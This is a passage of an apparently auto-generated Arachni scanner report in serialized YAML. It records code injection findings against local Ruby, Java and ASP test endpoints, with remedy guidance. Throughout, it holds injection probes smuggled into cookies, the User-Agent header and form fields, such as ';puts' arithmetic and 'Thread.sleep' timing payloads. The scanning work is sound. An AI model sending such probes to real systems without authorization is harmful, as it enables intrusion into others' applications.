http://en.wikipedia.org/wiki/Eval#Ruby var: cookie2 url: http://localhost:6875/ruby/cookie/append elem: cookie method: GET name: Code injection description: ! "Arbitrary code can be injected into the web application\n which is then executed as part of the system." 
tags: - code - injection - regexp cwe: '94' cwe_url: http://cwe.mitre.org/data/definitions/94.html severity: High cvssv2: '7.5' remedy_guidance: ! "User inputs must be validated and filtered\n before being evaluated as executable code.\n Better yet, the web application should stop evaluating user\n inputs as any part of dynamic code altogether." remedy_code: '' metasploitable: unix/webapp/arachni_php_eval mod_name: Code injection variations: - !ruby/object:Arachni::Issue verification: true references: PHP: http://php.net/manual/en/function.eval.php Perl: http://perldoc.perl.org/functions/eval.html Python: http://docs.python.org/py3k/library/functions.html#eval ASP: http://www.aspdev.org/asp/asp-eval-execute/ Ruby: http://en.wikipedia.org/wiki/Eval#Ruby opts: :redundant: false :async: true :regexp: '4196690816913082' :match: '4196690816913082' :substring: '4196690816913082' :ignore: :elements: - link - form - cookie - header - body :train: :format: - 2 - 1 :injected_orig: ;puts 287630581954+4196403186331128 :altered: !binary |- Y29va2llMg== :element: cookie :params: {} :follow_location: true :cookies: !binary "Y29va2llMg==": cookie value;puts 287630581954+4196403186331128 :injected: cookie value;puts 287630581954+4196403186331128 :combo: !binary "Y29va2llMg==": cookie value;puts 287630581954+4196403186331128 :action: http://localhost:6875/ruby/cookie/append :verification: false :id: '4196690816913082' var: cookie2 url: http://localhost:6875/ruby/cookie/append injected: cookie value;puts 287630581954+4196403186331128 id: '4196690816913082' regexp: '4196690816913082' regexp_match: '4196690816913082' elem: cookie remarks: {} method: GET response: ! 
'[4196690816913082]' headers: request: Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 User-Agent: Arachni/v1.0dev Cookie: cookie2=cookie+value%3Bputs+287630581954%2B4196403186331128;cookie=cookie+value response: !binary "WC1GcmFtZS1PcHRpb25z": !binary |- U0FNRU9SSUdJTg== !binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |- MTsgbW9kZT1ibG9jaw== !binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |- bm9zbmlmZg== !binary "Q29udGVudC1UeXBl": !binary |- dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg= !binary "Q29udGVudC1MZW5ndGg=": !binary |- MTg= !binary "U2VydmVy": !binary |- V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ== !binary "RGF0ZQ==": !binary |- TW9uLCAxMSBGZWIgMjAxMyAwMToxNzo0NiBHTVQ= !binary "Q29ubmVjdGlvbg==": !binary |- S2VlcC1BbGl2ZQ== name: Code injection description: ! "Arbitrary code can be injected into the web application\n which is then executed as part of the system." tags: - code - injection - regexp cwe: '94' cwe_url: http://cwe.mitre.org/data/definitions/94.html severity: High cvssv2: '7.5' remedy_guidance: ! "User inputs must be validated and filtered\n before being evaluated as executable code.\n Better yet, the web application should stop evaluating user\n inputs as any part of dynamic code altogether." remedy_code: '' metasploitable: unix/webapp/arachni_php_eval mod_name: Code injection variations: [] internal_modname: CodeInjection internal_modname: CodeInjection - !ruby/object:Arachni::Issue verification: false references: PHP: http://php.net/manual/en/function.eval.php Perl: http://perldoc.perl.org/functions/eval.html Python: http://docs.python.org/py3k/library/functions.html#eval ASP: http://www.aspdev.org/asp/asp-eval-execute/ Ruby: http://en.wikipedia.org/wiki/Eval#Ruby var: cookie url: http://localhost:6875/ruby/cookie/straight elem: cookie method: GET name: Code injection description: ! "Arbitrary code can be injected into the web application\n which is then executed as part of the system." 
tags: - code - injection - regexp cwe: '94' cwe_url: http://cwe.mitre.org/data/definitions/94.html severity: High cvssv2: '7.5' remedy_guidance: ! "User inputs must be validated and filtered\n before being evaluated as executable code.\n Better yet, the web application should stop evaluating user\n inputs as any part of dynamic code altogether." remedy_code: '' metasploitable: unix/webapp/arachni_php_eval mod_name: Code injection variations: - !ruby/object:Arachni::Issue verification: false references: PHP: http://php.net/manual/en/function.eval.php Perl: http://perldoc.perl.org/functions/eval.html Python: http://docs.python.org/py3k/library/functions.html#eval ASP: http://www.aspdev.org/asp/asp-eval-execute/ Ruby: http://en.wikipedia.org/wiki/Eval#Ruby opts: :redundant: false :async: true :regexp: '4196690816913082' :match: '4196690816913082' :substring: '4196690816913082' :ignore: :elements: - link - form - cookie - header - body :train: :format: - 2 - 1 :injected_orig: ;puts 287630581954+4196403186331128 :altered: !binary |- Y29va2ll :element: cookie :params: {} :follow_location: true :cookies: !binary "Y29va2ll": ;puts 287630581954+4196403186331128 :injected: ;puts 287630581954+4196403186331128 :combo: !binary "Y29va2ll": ;puts 287630581954+4196403186331128 :action: http://localhost:6875/ruby/cookie/straight :verification: false :id: '4196690816913082' var: cookie url: http://localhost:6875/ruby/cookie/straight injected: ;puts 287630581954+4196403186331128 id: '4196690816913082' regexp: '4196690816913082' regexp_match: '4196690816913082' elem: cookie remarks: {} method: GET response: ! 
'[4196690816913082]' headers: request: Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 User-Agent: Arachni/v1.0dev Cookie: cookie2=cookie+value;cookie=%3Bputs+287630581954%2B4196403186331128 response: !binary "WC1GcmFtZS1PcHRpb25z": !binary |- U0FNRU9SSUdJTg== !binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |- MTsgbW9kZT1ibG9jaw== !binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |- bm9zbmlmZg== !binary "Q29udGVudC1UeXBl": !binary |- dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg= !binary "Q29udGVudC1MZW5ndGg=": !binary |- MTg= !binary "U2VydmVy": !binary |- V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ== !binary "RGF0ZQ==": !binary |- TW9uLCAxMSBGZWIgMjAxMyAwMToxNzo0NyBHTVQ= !binary "Q29ubmVjdGlvbg==": !binary |- S2VlcC1BbGl2ZQ== name: Code injection description: ! "Arbitrary code can be injected into the web application\n which is then executed as part of the system." tags: - code - injection - regexp cwe: '94' cwe_url: http://cwe.mitre.org/data/definitions/94.html severity: High cvssv2: '7.5' remedy_guidance: ! "User inputs must be validated and filtered\n before being evaluated as executable code.\n Better yet, the web application should stop evaluating user\n inputs as any part of dynamic code altogether." remedy_code: '' metasploitable: unix/webapp/arachni_php_eval mod_name: Code injection variations: [] internal_modname: CodeInjection internal_modname: CodeInjection - !ruby/object:Arachni::Issue verification: false references: PHP: http://php.net/manual/en/function.eval.php Perl: http://perldoc.perl.org/functions/eval.html Python: http://docs.python.org/py3k/library/functions.html#eval ASP: http://www.aspdev.org/asp/asp-eval-execute/ Ruby: http://en.wikipedia.org/wiki/Eval#Ruby var: User-Agent url: http://localhost:6875/ruby/header/append elem: header method: GET name: Code injection description: ! "Arbitrary code can be injected into the web application\n which is then executed as part of the system." 
tags: - code - injection - regexp cwe: '94' cwe_url: http://cwe.mitre.org/data/definitions/94.html severity: High cvssv2: '7.5' remedy_guidance: ! "User inputs must be validated and filtered\n before being evaluated as executable code.\n Better yet, the web application should stop evaluating user\n inputs as any part of dynamic code altogether." remedy_code: '' metasploitable: unix/webapp/arachni_php_eval mod_name: Code injection variations: - !ruby/object:Arachni::Issue verification: false references: PHP: http://php.net/manual/en/function.eval.php Perl: http://perldoc.perl.org/functions/eval.html Python: http://docs.python.org/py3k/library/functions.html#eval ASP: http://www.aspdev.org/asp/asp-eval-execute/ Ruby: http://en.wikipedia.org/wiki/Eval#Ruby opts: :redundant: false :async: true :regexp: '4196690816913082' :match: '4196690816913082' :substring: '4196690816913082' :ignore: :elements: - link - form - cookie - header - body :train: :format: - 2 - 1 :injected_orig: ;puts 287630581954+4196403186331128 :altered: User-Agent :element: header :params: :follow_location: true :headers: User-Agent: arachni_user;puts 287630581954+4196403186331128 :injected: arachni_user;puts 287630581954+4196403186331128 :combo: User-Agent: arachni_user;puts 287630581954+4196403186331128 :action: http://localhost:6875/ruby/header/append :verification: false :id: '4196690816913082' var: User-Agent url: http://localhost:6875/ruby/header/append injected: arachni_user;puts 287630581954+4196403186331128 id: '4196690816913082' regexp: '4196690816913082' regexp_match: '4196690816913082' elem: header remarks: {} method: GET response: ! 
'[4196690816913082]' headers: request: Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 User-Agent: arachni_user;puts 287630581954+4196403186331128 Cookie: cookie2=cookie+value;cookie=cookie+value response: !binary "WC1GcmFtZS1PcHRpb25z": !binary |- U0FNRU9SSUdJTg== !binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |- MTsgbW9kZT1ibG9jaw== !binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |- bm9zbmlmZg== !binary "Q29udGVudC1UeXBl": !binary |- dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg= !binary "Q29udGVudC1MZW5ndGg=": !binary |- MTg= !binary "U2VydmVy": !binary |- V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ== !binary "RGF0ZQ==": !binary |- TW9uLCAxMSBGZWIgMjAxMyAwMToxNzo1NSBHTVQ= !binary "Q29ubmVjdGlvbg==": !binary |- S2VlcC1BbGl2ZQ== name: Code injection description: ! "Arbitrary code can be injected into the web application\n which is then executed as part of the system." tags: - code - injection - regexp cwe: '94' cwe_url: http://cwe.mitre.org/data/definitions/94.html severity: High cvssv2: '7.5' remedy_guidance: ! "User inputs must be validated and filtered\n before being evaluated as executable code.\n Better yet, the web application should stop evaluating user\n inputs as any part of dynamic code altogether." remedy_code: '' metasploitable: unix/webapp/arachni_php_eval mod_name: Code injection variations: [] internal_modname: CodeInjection internal_modname: CodeInjection - !ruby/object:Arachni::Issue verification: false references: PHP: http://php.net/manual/en/function.eval.php Perl: http://perldoc.perl.org/functions/eval.html Python: http://docs.python.org/py3k/library/functions.html#eval ASP: http://www.aspdev.org/asp/asp-eval-execute/ Ruby: http://en.wikipedia.org/wiki/Eval#Ruby var: User-Agent url: http://localhost:6875/ruby/header/straight elem: header method: GET name: Code injection description: ! "Arbitrary code can be injected into the web application\n which is then executed as part of the system." 
tags: - code - injection - regexp cwe: '94' cwe_url: http://cwe.mitre.org/data/definitions/94.html severity: High cvssv2: '7.5' remedy_guidance: ! "User inputs must be validated and filtered\n before being evaluated as executable code.\n Better yet, the web application should stop evaluating user\n inputs as any part of dynamic code altogether." remedy_code: '' metasploitable: unix/webapp/arachni_php_eval mod_name: Code injection variations: - !ruby/object:Arachni::Issue verification: false references: PHP: http://php.net/manual/en/function.eval.php Perl: http://perldoc.perl.org/functions/eval.html Python: http://docs.python.org/py3k/library/functions.html#eval ASP: http://www.aspdev.org/asp/asp-eval-execute/ Ruby: http://en.wikipedia.org/wiki/Eval#Ruby opts: :redundant: false :async: true :regexp: '4196690816913082' :match: '4196690816913082' :substring: '4196690816913082' :ignore: :elements: - link - form - cookie - header - body :train: :format: - 2 - 1 :injected_orig: ;puts 287630581954+4196403186331128 :altered: User-Agent :element: header :params: :follow_location: true :headers: User-Agent: ;puts 287630581954+4196403186331128 :injected: ;puts 287630581954+4196403186331128 :combo: User-Agent: ;puts 287630581954+4196403186331128 :action: http://localhost:6875/ruby/header/straight :verification: false :id: '4196690816913082' var: User-Agent url: http://localhost:6875/ruby/header/straight injected: ;puts 287630581954+4196403186331128 id: '4196690816913082' regexp: '4196690816913082' regexp_match: '4196690816913082' elem: header remarks: {} method: GET response: ! 
'[4196690816913082]' headers: request: Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 User-Agent: ;puts 287630581954+4196403186331128 Cookie: cookie2=cookie+value;cookie=cookie+value response: !binary "WC1GcmFtZS1PcHRpb25z": !binary |- U0FNRU9SSUdJTg== !binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |- MTsgbW9kZT1ibG9jaw== !binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |- bm9zbmlmZg== !binary "Q29udGVudC1UeXBl": !binary |- dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg= !binary "Q29udGVudC1MZW5ndGg=": !binary |- MTg= !binary "U2VydmVy": !binary |- V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ== !binary "RGF0ZQ==": !binary |- TW9uLCAxMSBGZWIgMjAxMyAwMToxNzo1NiBHTVQ= !binary "Q29ubmVjdGlvbg==": !binary |- S2VlcC1BbGl2ZQ== name: Code injection description: ! "Arbitrary code can be injected into the web application\n which is then executed as part of the system." tags: - code - injection - regexp cwe: '94' cwe_url: http://cwe.mitre.org/data/definitions/94.html severity: High cvssv2: '7.5' remedy_guidance: ! "User inputs must be validated and filtered\n before being evaluated as executable code.\n Better yet, the web application should stop evaluating user\n inputs as any part of dynamic code altogether." remedy_code: '' metasploitable: unix/webapp/arachni_php_eval mod_name: Code injection variations: [] internal_modname: CodeInjection internal_modname: CodeInjection - !ruby/object:Arachni::Issue verification: false references: PHP: http://php.net/manual/en/function.eval.php Perl: http://perldoc.perl.org/functions/eval.html Python: http://docs.python.org/py3k/library/functions.html#eval ASP: http://www.aspdev.org/asp/asp-eval-execute/ Ruby: http://en.wikipedia.org/wiki/Eval#Ruby var: input url: http://localhost:14309/java/form/straight elem: form method: POST name: Code injection (timing attack) description: ! 
"Arbitrary code can be injected into the web application\n which is then executed as part of the system.\n (This issue was discovered using a timing attack; timing attacks\n can result in false positives in cases where the server takes\n an abnormally long time to respond.\n Either case, these issues will require further investigation\n even if they are false positives.)" tags: - code - injection - timing - blind cwe: '94' cwe_url: http://cwe.mitre.org/data/definitions/94.html severity: High cvssv2: '7.5' remedy_guidance: ! "User inputs must be validated and filtered\n before being evaluated as executable code.\n Better yet, the web application should stop evaluating user\n inputs as any part of dynamic code altogether." remedy_code: '' metasploitable: unix/webapp/arachni_php_eval mod_name: Code injection (timing) variations: - !ruby/object:Arachni::Issue verification: false references: PHP: http://php.net/manual/en/function.eval.php Perl: http://perldoc.perl.org/functions/eval.html Python: http://docs.python.org/py3k/library/functions.html#eval ASP: http://www.aspdev.org/asp/asp-eval-execute/ Ruby: http://en.wikipedia.org/wiki/Eval#Ruby opts: :redundant: false :async: true :elements: - link - form - cookie - header - body :train: :format: - 1 :timeout: 11200.0 :timeout_divider: 1 :timing_string: ! ' Thread.sleep(__TIME__);' :skip_orig: true :injected_orig: ! ' Thread.sleep(16000);' :altered: !binary |- aW5wdXQ= :element: form :params: !binary "aW5wdXQ=": ! ' Thread.sleep(16000);' :follow_location: true :injected: ! ' Thread.sleep(16000);' :combo: !binary "aW5wdXQ=": ! ' Thread.sleep(16000);' :action: http://localhost:14309/java/form/straight :silent: true :regexp: '' var: input url: http://localhost:14309/java/form/straight injected: ! 
' Thread.sleep(16000);' id: regexp: '' regexp_match: elem: form remarks: {} method: POST response: '' headers: request: Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 User-Agent: Arachni/v1.0dev Cookie: cookie=cookie+value response: {} name: Code injection (timing attack) description: ! "Arbitrary code can be injected into the web application\n which is then executed as part of the system.\n (This issue was discovered using a timing attack; timing attacks\n can result in false positives in cases where the server takes\n an abnormally long time to respond.\n Either case, these issues will require further investigation\n even if they are false positives.)" tags: - code - injection - timing - blind cwe: '94' cwe_url: http://cwe.mitre.org/data/definitions/94.html severity: High cvssv2: '7.5' remedy_guidance: ! "User inputs must be validated and filtered\n before being evaluated as executable code.\n Better yet, the web application should stop evaluating user\n inputs as any part of dynamic code altogether." remedy_code: '' metasploitable: unix/webapp/arachni_php_eval mod_name: Code injection (timing) variations: [] internal_modname: CodeInjectionTiming internal_modname: CodeInjectionTiming - !ruby/object:Arachni::Issue verification: false references: PHP: http://php.net/manual/en/function.eval.php Perl: http://perldoc.perl.org/functions/eval.html Python: http://docs.python.org/py3k/library/functions.html#eval ASP: http://www.aspdev.org/asp/asp-eval-execute/ Ruby: http://en.wikipedia.org/wiki/Eval#Ruby var: input url: http://localhost:14309/java/link/straight?input=default elem: link method: GET name: Code injection (timing attack) description: ! 
"Arbitrary code can be injected into the web application\n which is then executed as part of the system.\n (This issue was discovered using a timing attack; timing attacks\n can result in false positives in cases where the server takes\n an abnormally long time to respond.\n Either case, these issues will require further investigation\n even if they are false positives.)" tags: - code - injection - timing - blind cwe: '94' cwe_url: http://cwe.mitre.org/data/definitions/94.html severity: High cvssv2: '7.5' remedy_guidance: ! "User inputs must be validated and filtered\n before being evaluated as executable code.\n Better yet, the web application should stop evaluating user\n inputs as any part of dynamic code altogether." remedy_code: '' metasploitable: unix/webapp/arachni_php_eval mod_name: Code injection (timing) variations: - !ruby/object:Arachni::Issue verification: false references: PHP: http://php.net/manual/en/function.eval.php Perl: http://perldoc.perl.org/functions/eval.html Python: http://docs.python.org/py3k/library/functions.html#eval ASP: http://www.aspdev.org/asp/asp-eval-execute/ Ruby: http://en.wikipedia.org/wiki/Eval#Ruby opts: :redundant: false :async: true :elements: - link - form - cookie - header - body :train: :format: - 1 :timeout: 11200.0 :timeout_divider: 1 :timing_string: ! ' Thread.sleep(__TIME__);' :skip_orig: true :injected_orig: ! ' Thread.sleep(16000);' :altered: !binary |- aW5wdXQ= :element: link :params: !binary "aW5wdXQ=": ! ' Thread.sleep(16000);' :follow_location: true :injected: ! ' Thread.sleep(16000);' :combo: !binary "aW5wdXQ=": ! ' Thread.sleep(16000);' :action: http://localhost:14309/java/link/straight?input=default :silent: true :regexp: '' var: input url: http://localhost:14309/java/link/straight?input=default injected: ! 
' Thread.sleep(16000);' id: regexp: '' regexp_match: elem: link remarks: {} method: GET response: '' headers: request: Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 User-Agent: Arachni/v1.0dev Cookie: cookie=cookie+value response: {} name: Code injection (timing attack) description: ! "Arbitrary code can be injected into the web application\n which is then executed as part of the system.\n (This issue was discovered using a timing attack; timing attacks\n can result in false positives in cases where the server takes\n an abnormally long time to respond.\n Either case, these issues will require further investigation\n even if they are false positives.)" tags: - code - injection - timing - blind cwe: '94' cwe_url: http://cwe.mitre.org/data/definitions/94.html severity: High cvssv2: '7.5' remedy_guidance: ! "User inputs must be validated and filtered\n before being evaluated as executable code.\n Better yet, the web application should stop evaluating user\n inputs as any part of dynamic code altogether." remedy_code: '' metasploitable: unix/webapp/arachni_php_eval mod_name: Code injection (timing) variations: [] internal_modname: CodeInjectionTiming internal_modname: CodeInjectionTiming - !ruby/object:Arachni::Issue verification: false references: PHP: http://php.net/manual/en/function.eval.php Perl: http://perldoc.perl.org/functions/eval.html Python: http://docs.python.org/py3k/library/functions.html#eval ASP: http://www.aspdev.org/asp/asp-eval-execute/ Ruby: http://en.wikipedia.org/wiki/Eval#Ruby var: cookie url: http://localhost:14309/java/cookie/straight elem: cookie method: GET name: Code injection (timing attack) description: ! 
"Arbitrary code can be injected into the web application\n which is then executed as part of the system.\n (This issue was discovered using a timing attack; timing attacks\n can result in false positives in cases where the server takes\n an abnormally long time to respond.\n Either case, these issues will require further investigation\n even if they are false positives.)" tags: - code - injection - timing - blind cwe: '94' cwe_url: http://cwe.mitre.org/data/definitions/94.html severity: High cvssv2: '7.5' remedy_guidance: ! "User inputs must be validated and filtered\n before being evaluated as executable code.\n Better yet, the web application should stop evaluating user\n inputs as any part of dynamic code altogether." remedy_code: '' metasploitable: unix/webapp/arachni_php_eval mod_name: Code injection (timing) variations: - !ruby/object:Arachni::Issue verification: false references: PHP: http://php.net/manual/en/function.eval.php Perl: http://perldoc.perl.org/functions/eval.html Python: http://docs.python.org/py3k/library/functions.html#eval ASP: http://www.aspdev.org/asp/asp-eval-execute/ Ruby: http://en.wikipedia.org/wiki/Eval#Ruby opts: :redundant: false :async: true :elements: - link - form - cookie - header - body :train: :format: - 1 :timeout: 11200.0 :timeout_divider: 1 :timing_string: ! ' Thread.sleep(__TIME__);' :skip_orig: true :injected_orig: ! ' Thread.sleep(16000);' :altered: !binary |- Y29va2ll :element: cookie :params: {} :follow_location: true :cookies: !binary "Y29va2ll": ! ' Thread.sleep(16000);' :injected: ! ' Thread.sleep(16000);' :combo: !binary "Y29va2ll": ! ' Thread.sleep(16000);' :action: http://localhost:14309/java/cookie/straight :silent: true :regexp: '' var: cookie url: http://localhost:14309/java/cookie/straight injected: ! 
' Thread.sleep(16000);' id: regexp: '' regexp_match: elem: cookie remarks: {} method: GET response: '' headers: request: Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 User-Agent: Arachni/v1.0dev Cookie: cookie=++Thread.sleep(16000)%3B response: {} name: Code injection (timing attack) description: ! "Arbitrary code can be injected into the web application\n which is then executed as part of the system.\n (This issue was discovered using a timing attack; timing attacks\n can result in false positives in cases where the server takes\n an abnormally long time to respond.\n Either case, these issues will require further investigation\n even if they are false positives.)" tags: - code - injection - timing - blind cwe: '94' cwe_url: http://cwe.mitre.org/data/definitions/94.html severity: High cvssv2: '7.5' remedy_guidance: ! "User inputs must be validated and filtered\n before being evaluated as executable code.\n Better yet, the web application should stop evaluating user\n inputs as any part of dynamic code altogether." remedy_code: '' metasploitable: unix/webapp/arachni_php_eval mod_name: Code injection (timing) variations: [] internal_modname: CodeInjectionTiming internal_modname: CodeInjectionTiming - !ruby/object:Arachni::Issue verification: false references: PHP: http://php.net/manual/en/function.eval.php Perl: http://perldoc.perl.org/functions/eval.html Python: http://docs.python.org/py3k/library/functions.html#eval ASP: http://www.aspdev.org/asp/asp-eval-execute/ Ruby: http://en.wikipedia.org/wiki/Eval#Ruby var: User-Agent url: http://localhost:14309/java/header/straight elem: header method: GET name: Code injection (timing attack) description: ! 
"Arbitrary code can be injected into the web application\n which is then executed as part of the system.\n (This issue was discovered using a timing attack; timing attacks\n can result in false positives in cases where the server takes\n an abnormally long time to respond.\n Either case, these issues will require further investigation\n even if they are false positives.)" tags: - code - injection - timing - blind cwe: '94' cwe_url: http://cwe.mitre.org/data/definitions/94.html severity: High cvssv2: '7.5' remedy_guidance: ! "User inputs must be validated and filtered\n before being evaluated as executable code.\n Better yet, the web application should stop evaluating user\n inputs as any part of dynamic code altogether." remedy_code: '' metasploitable: unix/webapp/arachni_php_eval mod_name: Code injection (timing) variations: - !ruby/object:Arachni::Issue verification: false references: PHP: http://php.net/manual/en/function.eval.php Perl: http://perldoc.perl.org/functions/eval.html Python: http://docs.python.org/py3k/library/functions.html#eval ASP: http://www.aspdev.org/asp/asp-eval-execute/ Ruby: http://en.wikipedia.org/wiki/Eval#Ruby opts: :redundant: false :async: true :elements: - link - form - cookie - header - body :train: :format: - 1 :timeout: 11200.0 :timeout_divider: 1 :timing_string: ! ' && Thread.sleep(__TIME__);' :skip_orig: true :injected_orig: ! ' && Thread.sleep(16000);' :altered: User-Agent :element: header :params: :follow_location: true :headers: User-Agent: ! ' && Thread.sleep(16000);' :injected: ! ' && Thread.sleep(16000);' :combo: User-Agent: ! ' && Thread.sleep(16000);' :action: http://localhost:14309/java/header/straight :silent: true :regexp: '' var: User-Agent url: http://localhost:14309/java/header/straight injected: ! ' && Thread.sleep(16000);' id: regexp: '' regexp_match: elem: header remarks: {} method: GET response: '' headers: request: Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 User-Agent: ! 
' && Thread.sleep(16000);' Cookie: cookie=cookie+value response: {} name: Code injection (timing attack) description: ! "Arbitrary code can be injected into the web application\n which is then executed as part of the system.\n (This issue was discovered using a timing attack; timing attacks\n can result in false positives in cases where the server takes\n an abnormally long time to respond.\n Either case, these issues will require further investigation\n even if they are false positives.)" tags: - code - injection - timing - blind cwe: '94' cwe_url: http://cwe.mitre.org/data/definitions/94.html severity: High cvssv2: '7.5' remedy_guidance: ! "User inputs must be validated and filtered\n before being evaluated as executable code.\n Better yet, the web application should stop evaluating user\n inputs as any part of dynamic code altogether." remedy_code: '' metasploitable: unix/webapp/arachni_php_eval mod_name: Code injection (timing) variations: [] internal_modname: CodeInjectionTiming internal_modname: CodeInjectionTiming - !ruby/object:Arachni::Issue verification: false references: PHP: http://php.net/manual/en/function.eval.php Perl: http://perldoc.perl.org/functions/eval.html Python: http://docs.python.org/py3k/library/functions.html#eval ASP: http://www.aspdev.org/asp/asp-eval-execute/ Ruby: http://en.wikipedia.org/wiki/Eval#Ruby var: input url: http://localhost:14309/asp/form/straight elem: form method: POST name: Code injection (timing attack) description: ! 
"Arbitrary code can be injected into the web application\n which is then executed as part of the system.\n (This issue was discovered using a timing attack; timing attacks\n can result in false positives in cases where the server takes\n an abnormally long time to respond.\n Either case, these issues will require further investigation\n even if they are false positives.)" tags: - code - injection - timing - blind cwe: '94' cwe_url: http://cwe.mitre.org/data/definitions/94.html severity: High cvssv2: '7.5' remedy_guidance: ! "User inputs must be validated and filtered\n before being evaluated as executable code.\n Better yet, the web application should stop evaluating user\n inputs as any part of dynamic code altogether." remedy_code: '' metasploitable: unix/webapp/arachni_php_eval mod_name: Code injection (timing) variations: - !ruby/object:Arachni::Issue verification: false references: PHP: http://php.net/manual/en/function.eval.php Perl: http://perldoc.perl.org/functions/eval.html Python: http://docs.python.org/py3k/library/functions.html#eval ASP: http://www.aspdev.org/asp/asp-eval-execute/ Ruby: http://en.wikipedia.org/wiki/Eval#Ruby opts: :redundant: false :async: true :elements: - link - form - cookie - header - body :train: :format: - 1 :timeout: 11200.0 :timeout_divider: 1 :timing_string: ! ' Thread.Sleep(__TIME__);' :skip_orig: true :injected_orig: ! ' Thread.Sleep(16000);' :altered: !binary |- aW5wdXQ= :element: form :params: !binary "aW5wdXQ=": ! ' Thread.Sleep(16000);' :follow_location: true :injected: ! ' Thread.Sleep(16000);' :combo: !binary "aW5wdXQ=": ! ' Thread.Sleep(16000);' :action: http://localhost:14309/asp/form/straight :silent: true :regexp: '' var: input url: http://localhost:14309/asp/form/straight injected: ! 
' Thread.Sleep(16000);' id: regexp: '' regexp_match: elem: form remarks: {} method: POST response: '' headers: request: Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 User-Agent: Arachni/v1.0dev Cookie: cookie=cookie+value response: {} name: Code injection (timing attack) description: ! "Arbitrary code can be injected into the web application\n which is then executed as part of the system.\n (This issue was discovered using a timing attack; timing attacks\n can result in false positives in cases where the server takes\n an abnormally long time to respond.\n Either case, these issues will require further investigation\n even if they are false positives.)" tags: - code - injection - timing - blind cwe: '94' cwe_url: http://cwe.mitre.org/data/definitions/94.html severity: High cvssv2: '7.5' remedy_guidance: ! "User inputs must be validated and filtered\n before being evaluated as executable code.\n Better yet, the web application should stop evaluating user\n inputs as any part of dynamic code altogether." remedy_code: '' metasploitable: unix/webapp/arachni_php_eval mod_name: Code injection (timing) variations: [] internal_modname: CodeInjectionTiming internal_modname: CodeInjectionTiming - !ruby/object:Arachni::Issue verification: false references: PHP: http://php.net/manual/en/function.eval.php Perl: http://perldoc.perl.org/functions/eval.html Python: http://docs.python.org/py3k/library/functions.html#eval ASP: http://www.aspdev.org/asp/asp-eval-execute/ Ruby: http://en.wikipedia.org/wiki/Eval#Ruby var: input url: http://localhost:14309/asp/link/straight?input=default elem: link method: GET name: Code injection (timing attack) description: ! 
"Arbitrary code can be injected into the web application\n which is then executed as part of the system.\n (This issue was discovered using a timing attack; timing attacks\n can result in false positives in cases where the server takes\n an abnormally long time to respond.\n Either case, these issues will require further investigation\n even if they are false positives.)" tags: - code - injection - timing - blind cwe: '94' cwe_url: http://cwe.mitre.org/data/definitions/94.html severity: High cvssv2: '7.5' remedy_guidance: ! "User inputs must be validated and filtered\n before being evaluated as executable code.\n Better yet, the web application should stop evaluating user\n inputs as any part of dynamic code altogether." remedy_code: '' metasploitable: unix/webapp/arachni_php_eval mod_name: Code injection (timing) variations: - !ruby/object:Arachni::Issue verification: false references: PHP: http://php.net/manual/en/function.eval.php Perl: http://perldoc.perl.org/functions/eval.html Python: http://docs.python.org/py3k/library/functions.html#eval ASP: http://www.aspdev.org/asp/asp-eval-execute/ Ruby: http://en.wikipedia.org/wiki/Eval#Ruby opts: :redundant: false :async: true :elements: - link - form - cookie - header - body :train: :format: - 1 :timeout: 11200.0 :timeout_divider: 1 :timing_string: ! ' Thread.Sleep(__TIME__);' :skip_orig: true :injected_orig: ! ' Thread.Sleep(16000);' :altered: !binary |- aW5wdXQ= :element: link :params: !binary "aW5wdXQ=": ! ' Thread.Sleep(16000);' :follow_location: true :injected: ! ' Thread.Sleep(16000);' :combo: !binary "aW5wdXQ=": ! ' Thread.Sleep(16000);' :action: http://localhost:14309/asp/link/straight?input=default :silent: true :regexp: '' var: input url: http://localhost:14309/asp/link/straight?input=default injected: ! 
' Thread.Sleep(16000);' id: regexp: '' regexp_match: elem: link remarks: {} method: GET response: '' headers: request: Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 User-Agent: Arachni/v1.0dev Cookie: cookie=cookie+value response: {} name: Code injection (timing attack) description: ! "Arbitrary code can be injected into the web application\n which is then executed as part of the system.\n (This issue was discovered using a timing attack; timing attacks\n can result in false positives in cases where the server takes\n an abnormally long time to respond.\n Either case, these issues will require further investigation\n even if they are false positives.)" tags: - code - injection - timing - blind cwe: '94' cwe_url: http://cwe.mitre.org/data/definitions/94.html severity: High cvssv2: '7.5' remedy_guidance: ! "User inputs must be validated and filtered\n before being evaluated as executable code.\n Better yet, the web application should stop evaluating user\n inputs as any part of dynamic code altogether." remedy_code: '' metasploitable: unix/webapp/arachni_php_eval mod_name: Code injection (timing) variations: [] internal_modname: CodeInjectionTiming internal_modname: CodeInjectionTiming - !ruby/object:Arachni::Issue verification: false references: PHP: http://php.net/manual/en/function.eval.php Perl: http://perldoc.perl.org/functions/eval.html Python: http://docs.python.org/py3k/library/functions.html#eval ASP: http://www.aspdev.org/asp/asp-eval-execute/ 